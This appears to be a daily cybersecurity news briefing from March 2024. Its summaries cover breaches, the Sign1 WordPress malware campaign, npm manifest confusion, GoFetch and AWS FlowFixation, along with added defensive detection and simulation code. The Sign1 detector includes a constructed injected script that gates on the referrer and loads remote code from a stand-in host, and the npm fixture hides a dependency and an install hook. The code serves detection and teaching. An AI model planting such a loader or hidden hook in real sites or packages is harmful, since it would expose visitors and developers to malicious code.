Cyware Daily Threat Intelligence

Daily Threat Briefing • Mar 22, 2024
A formidable challenge hovers over Apple: an unpatchable vulnerability in its M-series chips threatens to expose secret encryption keys. On the malware front, a campaign dubbed Sign1 has infected 39,000 websites in six months, causing unwanted redirects and popup ads; it came to researchers' attention after an infected site started serving those popups. A new phishing wave is also spreading the ever-evolving StrelaStealer malware to over 100 organizations in the EU and the U.S., Palo Alto Networks' Unit 42 found.
New research laid bare over 800 suspicious npm packages whose registry metadata does not match their published contents, a discrepancy that can allow stealthy installation of malicious dependencies. Vigilance and package analysis are a must to protect developers from running harmful code. Additionally, a one-click vulnerability dubbed FlowFixation was discovered in AWS's Managed Workflows for Apache Airflow service.
Rhysida group claims attack on MarineMax
Rhysida ransomware group claimed responsibility for the recent cyberattack on the U.S. luxury yacht dealer MarineMax. Although MarineMax initially disclosed the incident without mentioning ransomware, Rhysida has now posted snippets of stolen data on its website. The majority of leaked documents seem related to accounts and finances. Rhysida is reportedly conducting a seven-day auction for the data.
SCAA targeted in a cyberattack
The South China Athletic Association (SCAA) faced a cyberattack on March 17, which prompted the organization to shut down affected servers. An investigation estimated 70,000 affected individuals. Authorities recommended victims stay vigilant, change passwords, and handle personal data carefully.
Air Europa leaks customer data
Spanish airline Air Europa disclosed a data breach compromising customer data, including names, birthdays, nationalities, ID card numbers, passport details, and phone numbers. Although no fraudulent use of the leaked data has been observed so far, the exposure of identity document details raised concerns among affected customers.
Malware campaign infects 39,000 websites
A newly discovered malware campaign, dubbed Sign1, infected over 39,000 websites in the past six months, primarily targeting WordPress sites. The threat actors inject malicious scripts into custom HTML widgets and into legitimate plugins such as Simple Custom CSS and JS, and use time-based randomization of the loader URL to evade detection and blocklisting. The injected script redirects visitors to scam sites only when they arrive from major search and social platforms, and stays dormant for everyone else, which keeps site owners and scanners from noticing it.
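The two behaviours described above, referrer gating and a time-derived loader URL, are what an analyst can look for when triaging widget content pulled from a WordPress database. The following is an added example, not Sucuri's or the campaign's code: a heuristic scorer over inline scripts that flags the combination of indicators, applied to two constructed widget entries (one benign analytics loader, one modelled on the described injection). The indicator list and the "suspicious" threshold are illustrative choices, not a signature.

```python
"""Heuristic triage of WordPress custom HTML widget content for Sign1-style
injections. Added example; widget entries and indicator thresholds are
constructed for illustration, not taken from the campaign."""
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)

# No single indicator is malicious on its own (analytics snippets load scripts
# dynamically too). The campaign described above needs all three of the first
# group together: gate on referrer, derive a URL from the clock, load it.
INDICATORS = [
    ("referrer_gate", re.compile(r"document\.referrer", re.I)),
    ("time_derived", re.compile(r"(Date\.now\(\)|new\s+Date\(\)|getTime\(\))", re.I)),
    ("dynamic_loader", re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I)),
    ("obfuscated_hex", re.compile(r"(\\x[0-9a-f]{2}){4,}", re.I)),
]
CORE = {"referrer_gate", "time_derived", "dynamic_loader"}


def triage_widget(html: str) -> dict:
    """Scan every inline <script> in a widget's HTML and report which
    indicators fire; 'suspicious' means the full referrer/time/loader chain
    is present."""
    hits = set()
    for script in SCRIPT_RE.findall(html):
        for label, pattern in INDICATORS:
            if pattern.search(script):
                hits.add(label)
    return {"indicators": sorted(hits), "suspicious": CORE <= hits}


# Constructed sample 1: a normal third-party analytics loader.
BENIGN_WIDGET = """<div class="widget_custom_html"><script>
(function(){var s=document.createElement('script');
s.src='https://analytics.example/a.js';document.head.appendChild(s);})();
</script></div>"""

# Constructed sample 2: modelled on the described behaviour. Only visitors
# referred by big platforms get a loader whose URL changes with the clock.
INJECTED_WIDGET = """<div class="widget_custom_html"><script>
var r=document.referrer;
if(/google|facebook|yahoo|instagram/i.test(r)){
  var t=Math.floor(Date.now()/600000);
  var s=document.createElement("script");
  s.src="https://loader.example.invalid/"+t+".js";
  document.head.appendChild(s);
}
</script></div>"""


def triage_all(widgets: dict) -> dict:
    """Run triage over a mapping of widget id -> HTML."""
    return {wid: triage_widget(html) for wid, html in widgets.items()}


if __name__ == "__main__":
    for wid, result in triage_all({"benign": BENIGN_WIDGET, "injected": INJECTED_WIDGET}).items():
        print(wid, result)
```

In practice the input would be the `widget_custom_html` option and the plugin's stored snippets exported from the database; anything flagged should be inspected by hand, and a clean result does not prove a site is uninfected, since the loader can be re-obfuscated.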
npm manifest confusion exposes developers to threats
JFrog's research uncovered over 800 npm packages whose registry manifest does not match the package.json inside the published tarball, 18 of which are exploitable for manifest confusion. The inconsistency, first documented in 2023, lets a publisher hide dependencies or install scripts that the registry's metadata does not show, so tooling that trusts the registry view can sneak malicious dependencies onto developers' systems. While there is no sign of exploitation so far, developers were urged to verify what a package actually contains, since relying solely on how it appears on npm is risky.
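The practical check is to compare the registry's per-version manifest against the package.json that ships inside the tarball, since that file is what the install actually acts on. The following is an added example, not JFrog's tooling: it reads package.json out of an in-memory npm-style tarball and reports every watched field that differs from the registry manifest. The registry manifest and tarball contents are constructed, and "example-pkg" and "evil-helper" are hypothetical names.

```python
"""Manifest confusion check: registry manifest vs. tarball package.json.
Added example; sample package data below is constructed for illustration."""
import io
import json
import tarfile

# Fields whose divergence changes what gets installed or executed.
WATCHED_FIELDS = ("name", "version", "dependencies", "scripts")


def package_json_from_tarball(tgz_bytes: bytes) -> dict:
    """Read package/package.json from an npm tarball (.tgz) held in memory.
    npm tarballs always place files under the 'package/' prefix."""
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        member = tar.getmember("package/package.json")
        return json.load(tar.extractfile(member))


def manifest_discrepancies(registry_manifest: dict, tarball_manifest: dict) -> dict:
    """Return {field: (registry_value, tarball_value)} for each watched field
    that differs. A field absent on one side shows up as None."""
    diffs = {}
    for field in WATCHED_FIELDS:
        reg, tar = registry_manifest.get(field), tarball_manifest.get(field)
        if reg != tar:
            diffs[field] = (reg, tar)
    return diffs


def build_tarball(package_json: dict) -> bytes:
    """Construct a minimal npm-style tarball in memory (fixture only; a real
    check would download the tarball URL listed in the registry manifest)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = json.dumps(package_json).encode()
        info = tarfile.TarInfo("package/package.json")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample: the registry claims no dependencies and no scripts,
# while the tarball pulls an extra package and runs a postinstall hook.
REGISTRY_MANIFEST = {"name": "example-pkg", "version": "1.0.0", "dependencies": {}}
TARBALL_MANIFEST = {
    "name": "example-pkg",
    "version": "1.0.0",
    "dependencies": {"evil-helper": "^1.0.0"},
    "scripts": {"postinstall": "node setup.js"},
}


def check_sample() -> dict:
    """Run the comparison on the constructed fixture."""
    tgz = build_tarball(TARBALL_MANIFEST)
    return manifest_discrepancies(REGISTRY_MANIFEST, package_json_from_tarball(tgz))


if __name__ == "__main__":
    for field, (reg, tar) in check_sample().items():
        print(f"{field}: registry={reg!r} tarball={tar!r}")
```

Any non-empty result deserves a look before the package is installed; an install script that exists only in the tarball is exactly the case the research warns about.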
StrelaStealer infects hundreds of organizations
StrelaStealer, a notorious email credential-stealing malware, launched large-scale campaigns that have already impacted over 100 organizations in the EU and the U.S. These campaigns use spam emails with varying attachment formats to deliver StrelaStealer's DLL payload, with the attackers constantly changing tactics to evade detection. The malware, which steals email client login data, has been used in large-scale campaigns since its disclosure in November 2022.
Apple M-Series chips exposed to key leakage threat
Academic researchers unveiled an unpatchable flaw in Apple's M-series chips that can leak secret encryption keys. The attack, which the researchers call GoFetch, exploits a side channel in the chips' data memory-dependent prefetcher (DMP): because the prefetcher speculatively treats some data values as pointers, an unprivileged process on the same machine can infer key material from constant-time cryptographic code as it runs. Since the behaviour is part of the silicon, it cannot be patched; software mitigations that avoid the prefetcher or blind key-dependent data cost performance. Foresight News highlights the risk to cryptocurrency wallet keys, for which no direct remedy is available.
FortiClient EMS bug comes under attack
Horizon3 disclosed a PoC exploit for a critical SQL injection vulnerability in Fortinet's FortiClient Enterprise Management Server. This flaw, CVE-2023-48788, allows unauthenticated attackers to execute unauthorized commands. Active exploitation in the wild prompts urgent upgrades: FortiClientEMS 7.2.0 through 7.2.2 should be upgraded to 7.2.3 or higher, while versions 7.0.1 through 7.0.10 should be upgraded to 7.0.11 or above.
Flaws in Saflok locks put millions of doors at risk
Security researchers reported multiple vulnerabilities in dormakaba's Saflok electronic RFID locks, about three million of which are deployed across 13,000 hotel properties globally. The flaws were disclosed to the manufacturer in November 2022, and because they have existed for years and remediation proceeds property by property, there is concern they could be exploited before the remaining locks are fixed. The attack derives the property's master key material from a keycard and uses it to craft forged keycards that open any door, demonstrating the critical impact on hotel security.
ATO possible through AWS service bug
Tenable disclosed FlowFixation, a vulnerability in AWS's Managed Workflows for Apache Airflow (MWAA) service that could have allowed an attacker to take over a user's web panel session with a single click. It chained a session fixation flaw in the MWAA web panel with an AWS domain misconfiguration: the parent domain shared by customer instances was not treated as a public suffix, so a cookie set from an attacker-controlled sibling subdomain was sent to the victim's instance. With a hijacked session, an attacker could achieve remote code execution or move laterally. The flaw highlights a broader issue with shared parent domains across cloud services, which expose tenants to cookie tossing and CSRF protection bypass.
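The chain above has two independent links, and breaking either stops it: the browser must accept a cookie scoped to the shared parent domain, and the application must keep the session id it was handed when the user logs in. The following is an added example, not Tenable's proof of concept or AWS code: a minimal cookie jar with browser-style domain matching and a toy session store, run through the attack with the vulnerable behaviour, with login-time session rotation, and with the parent domain registered as a public suffix. The hostnames under `tenant-host.example` are hypothetical.

```python
"""Session fixation via a cookie tossed from a sibling subdomain, and the two
fixes (public-suffix registration; rotating the session on login).
Added example; hostnames and the session id are constructed."""
import secrets


def domain_matches(host: str, cookie_domain: str) -> bool:
    """RFC 6265 domain-match: host equals the cookie's Domain or is a
    subdomain of it."""
    host, cookie_domain = host.lower(), cookie_domain.lower().lstrip(".")
    return host == cookie_domain or host.endswith("." + cookie_domain)


class BrowserCookieJar:
    """Minimal jar honoring Domain= the way browsers do; cookies scoped to a
    public suffix are refused, which is the protection a shared parent domain
    lacks when it is not on the Public Suffix List."""

    def __init__(self, public_suffixes=frozenset()):
        self.public_suffixes = {s.lstrip(".") for s in public_suffixes}
        self.cookies = []  # (domain, name, value)

    def set_cookie(self, setting_host, name, value, domain) -> bool:
        domain = domain.lstrip(".")
        if domain in self.public_suffixes or not domain_matches(setting_host, domain):
            return False  # rejected, as a browser would
        self.cookies.append((domain, name, value))
        return True

    def cookies_for(self, host) -> dict:
        return {n: v for d, n, v in self.cookies if domain_matches(host, d)}


class App:
    """Toy session store. rotate_on_login=False reproduces session fixation:
    whatever session id the client presents is bound to the logged-in user."""

    def __init__(self, rotate_on_login: bool):
        self.rotate_on_login = rotate_on_login
        self.sessions = {}  # session id -> user

    def login(self, presented_sid, user) -> str:
        if presented_sid and not self.rotate_on_login:
            sid = presented_sid          # vulnerable: attacker-chosen id survives login
        else:
            sid = secrets.token_hex(16)  # hardened: fresh id issued at login
        self.sessions[sid] = user
        return sid

    def whoami(self, sid):
        return self.sessions.get(sid)


def run_attack(rotate_on_login: bool, public_suffixes=frozenset()) -> dict:
    """Attacker on attacker.tenant-host.example tosses a session cookie scoped
    to the shared parent; the victim then logs in on victim.tenant-host.example
    and the attacker replays the id they planted."""
    jar = BrowserCookieJar(public_suffixes)
    app = App(rotate_on_login)
    planted = "attacker-known-session"
    tossed = jar.set_cookie("attacker.tenant-host.example", "session", planted,
                            "tenant-host.example")
    presented = jar.cookies_for("victim.tenant-host.example").get("session")
    app.login(presented, "victim")
    return {"tossed": tossed, "attacker_sees": app.whoami(planted)}


if __name__ == "__main__":
    print("vulnerable:        ", run_attack(rotate_on_login=False))
    print("rotate on login:   ", run_attack(rotate_on_login=True))
    print("parent is suffix:  ", run_attack(rotate_on_login=False,
                                            public_suffixes={"tenant-host.example"}))
```

Rotating the session id on authentication is the fix any application owner controls; getting the shared parent domain onto the Public Suffix List is the fix only the cloud provider can apply, and it also closes the CSRF-bypass and cookie-tossing variants the page mentions, since they depend on the same cross-tenant cookie scope.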